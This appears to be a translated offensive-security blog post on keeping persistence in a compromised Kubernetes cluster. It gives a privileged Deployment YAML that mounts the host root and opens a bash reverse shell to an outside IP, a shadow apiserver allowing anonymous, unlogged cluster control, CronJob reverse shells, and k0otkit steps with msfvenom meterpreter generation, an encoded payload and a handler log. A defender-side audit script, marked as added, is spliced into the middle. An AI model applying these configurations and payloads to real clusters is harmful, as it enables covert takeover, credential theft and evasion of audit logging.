STATEMENT
Any direct or indirect consequences or losses caused by spreading or exploiting the information provided in this article are the sole responsibility of the user; 雷神众测 and the article's author accept no liability for them.
雷神众测 retains the right to modify and interpret this article. Anyone reposting or distributing it must preserve the article in full, including the copyright notice and all other content. Without permission from 雷神众测, the content may not be altered, extended or cut, and it may not be used for commercial purposes in any way.
Preface
Once you have gained a master or a node in a Kubernetes cluster by whatever means, how do you maintain that access and push the intrusion further? Is it done the way it would be on Linux or Windows?
Several common methods are covered here.
Abusing controllers
When containers are created through a DaemonSet or a Deployment, the container is recreated and restarted even after it is deleted, which is what gives the persistence.
Related concepts:
ReplicationController (RC): ensures that a specified number of Pods is running at all times.
ReplicaSet (RS): RS and Deployment are recommended over RC here. RS and RC are functionally almost identical; currently the only difference is that RC supports only equality-based selectors.
Deployment: delivers the same effect and responsibilities as an RC and can be thought of as an upgraded RC.
Deployment
Just write a YAML file that carries the reverse shell:
apiVersion: apps/v1
kind: Deployment            # keeps a specified number of pods running at all times
metadata:
  name: nginx-deployment
  labels:
    k8s-app: nginx-de
spec:
  replicas: 2               # number of pods
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: nginx
        image: nginx
        imagePullPolicy: IfNotPresent
        command: ["bash"]
        args: ["-c", "bash -i >& /dev/tcp/192.168.3.1/20221 0>&1"]
        securityContext:
          privileged: true  # privileged mode
        volumeMounts:
        - mountPath: /host  # mount point; after entering the directory, chroot ./ bash
          name: host-root
      volumes:
      - name: host-root
        hostPath:
          path: /
          type: Directory
node1 and node2 both send a shell back as shown below: the pods created above are scheduled on node1 and node2, so each connects back in turn.
If the created pods are deleted in the meantime, the Deployment automatically recreates them, so the reverse shell comes back and the persistence holds.
DaemonSet
The same procedure applies; the nodes send shells back in turn with the same effect.
Abusing a shadow apiserver
The self-deployed shadow apiserver here has the same capabilities as the cluster's existing apiserver, but in addition it has full k8s privileges opened up, accepts anonymous requests and keeps no logs, so an attacker can manage the whole cluster without leaving a trace.
The current api-server information is as follows:
Look for weak points; confirmed as follows:
Deploy the shadow apiserver directly with cdk; the result is as follows:
2022/03/31 06:20:04 shadow api-server deploy success!
shadow api-server pod name:kube-apiserver-master-shadow, namespace:kube-system, node name:master
listening insecure-port: 0.0.0.0:9443
listening secure-port: 0.0.0.0:9444 enabled all privilege for system:anonymous user
go further run `cdk kcurl anonymous get http://your-node-intranet-ip:9443/api` to takeover cluster with none audit logs!
Look at the deployed shadow again to confirm that the shadow apiserver came up successfully.
The configuration that implements this is as follows:
kube-apiserver
--advertise-address=192.168.3.19
--allow-privileged=true
--authorization-mode=AlwaysAllow
--client-ca-file=/etc/kubernetes/pki/ca.crt
--enable-admission-plugins=NodeRestriction
--enable-bootstrap-token-auth=true
--etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt
--etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt
--insecure-bind-address=0.0.0.0
--anonymous-auth=true
--etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key
--etcd-servers=https://127.0.0.1:2379
--insecure-port=9443
--kubelet-client-certificate=/etc/kubernetes/pki/apiserver-kubelet-client.crt
--kubelet-client-key=/etc/kubernetes/pki/apiserver-kubelet-client.key
--kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
--proxy-client-cert-file=/etc/kubernetes/pki/front-proxy-client.crt
--proxy-client-key-file=/etc/kubernetes/pki/front-proxy-client.key
--requestheader-allowed-names=front-proxy-client
--requestheader-client-ca-file=/etc/kubernetes/pki/front-proxy-ca.crt
--requestheader-extra-headers-prefix=X-Remote-Extra-
--requestheader-group-headers=X-Remote-Group
--requestheader-username-headers=X-Remote-User
--secure-port=9444
--service-account-key-file=/etc/kubernetes/pki/sa.pub
--service-cluster-ip-range=10.1.0.0/16
--tls-cert-file=/etc/kubernetes/pki/apiserver.crt
--tls-private-key-file=/etc/kubernetes/pki/apiserver.key
Once this is deployed, all subsequent operations can go through this new API [no authentication required].
Fetch all kinds of token information directly:
The same works through kubectl:
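A defender-side check for the configuration shown above, added here as an example and not part of the original article or of cdk. It reads the JSON that `kubectl get pods -n kube-system -o json` returns, picks out every kube-apiserver container and reports the flags that turn an apiserver into an unauthenticated one (`--authorization-mode=AlwaysAllow`, `--anonymous-auth=true`, a non-zero `--insecure-port`, `--insecure-bind-address`); it also reports any node that carries more than one apiserver pod, since a control-plane node normally runs exactly one. The pod list embedded at the bottom is constructed for the demonstration; its pod names follow the cdk output above.

```python
"""Audit kube-apiserver pods for 'shadow apiserver' settings.

Added example, not from the original article or from cdk.  Input has the
shape of `kubectl get pods -n kube-system -o json`; the pod list at the
bottom is constructed for the demonstration.
"""
import json
import sys


def parse_flags(command):
    """Turn ['kube-apiserver', '--secure-port=6443', ...] into {'--secure-port': '6443'}."""
    flags = {}
    for tok in command:
        if tok.startswith("--"):
            key, _, val = tok.partition("=")
            flags[key] = val
    return flags


def dangerous_flags(flags):
    """Return the flag=value pairs that remove authentication or authorization."""
    bad = []
    modes = flags.get("--authorization-mode", "").split(",")
    if "AlwaysAllow" in modes:
        bad.append("--authorization-mode=" + flags["--authorization-mode"])
    if flags.get("--anonymous-auth", "").lower() == "true":
        bad.append("--anonymous-auth=true")
    if flags.get("--insecure-port", "0") != "0":
        bad.append("--insecure-port=" + flags["--insecure-port"])
    if "--insecure-bind-address" in flags:
        bad.append("--insecure-bind-address=" + flags["--insecure-bind-address"])
    return bad


def audit_apiserver_pods(pod_list):
    """Return (pod-or-node name, finding) tuples.

    One finding per dangerous flag on a kube-apiserver container, plus one
    per node that hosts more than one apiserver pod.
    """
    findings = []
    apiservers_by_node = {}
    for pod in pod_list["items"]:
        name = pod["metadata"]["name"]
        node = pod["spec"].get("nodeName", "<unscheduled>")
        for c in pod["spec"]["containers"]:
            cmd = c.get("command", []) + c.get("args", [])
            if not cmd or "kube-apiserver" not in cmd[0]:
                continue
            apiservers_by_node.setdefault(node, []).append(name)
            for finding in dangerous_flags(parse_flags(cmd)):
                findings.append((name, finding))
    for node, names in apiservers_by_node.items():
        if len(names) > 1:
            findings.append((node, "multiple apiserver pods: " + ", ".join(sorted(names))))
    return findings


def _pod(name, node, cmd):
    """Build a minimal pod object (constructed test data)."""
    return {"metadata": {"name": name, "namespace": "kube-system"},
            "spec": {"nodeName": node,
                     "containers": [{"name": "kube-apiserver", "command": cmd}]}}


# Constructed sample: the regular apiserver plus a shadow copy carrying the
# flags seen in the cdk-deployed configuration above.
SAMPLE_PODS = {"items": [
    _pod("kube-apiserver-master", "master",
         ["kube-apiserver", "--authorization-mode=Node,RBAC", "--anonymous-auth=false",
          "--insecure-port=0", "--secure-port=6443"]),
    _pod("kube-apiserver-master-shadow", "master",
         ["kube-apiserver", "--authorization-mode=AlwaysAllow", "--anonymous-auth=true",
          "--insecure-bind-address=0.0.0.0", "--insecure-port=9443", "--secure-port=9444"]),
]}

if __name__ == "__main__":
    # Usage: python3 audit_apiserver.py pods.json   (pods.json from kubectl -o json)
    pods = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_PODS
    for who, what in audit_apiserver_pods(pods):
        print(f"{who}: {what}")
```

Because a shadow apiserver is a static pod written to the node's manifest directory, the same check is worth running against the files under /etc/kubernetes/manifests on each control-plane node, not only against what the real apiserver reports; an apiserver that keeps no audit log will not tell you about itself.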
Abusing CronJobs
CronJobs run periodic actions; deploy one via YAML to get a reverse shell on a schedule. Create the YAML for the scheduled job.
The result after creation and the reverse-shell details in the YAML are shown below:
Abusing k0otkit
Technical details:
https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw
Project download: https://github.com/Metarget/k0otkit
Download the project, make its files executable, and change the IP and port.
Generate the k0otkit payload and start the listener for the reverse shell:
┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]
└─# ./pre_exp.sh
+ ATTACKER_IP=192.168.3.11
+ ATTACKER_PORT=20227
+ TEMP_MRT=mrt
+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=20227 LHOST=192.168.3.11 -f elf -o mrt
++ base64 -w 0
++ tr -d '\n'
++ xxd -p mrt
+ PAYLOAD=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
+ sed s/PAYLOAD_VALUE_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 k0otkit_template.sh
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_remote_template.sh
┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]
└─# ./handle_multi_reverse_shell.sh
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:4444
msf6 exploit(multi/handler) >
Upload and run the k0otkit.sh file generated on the attacker machine.
After it runs, the effect is as follows: kube-proxy in kube-system is modified.
The callback shows up as follows: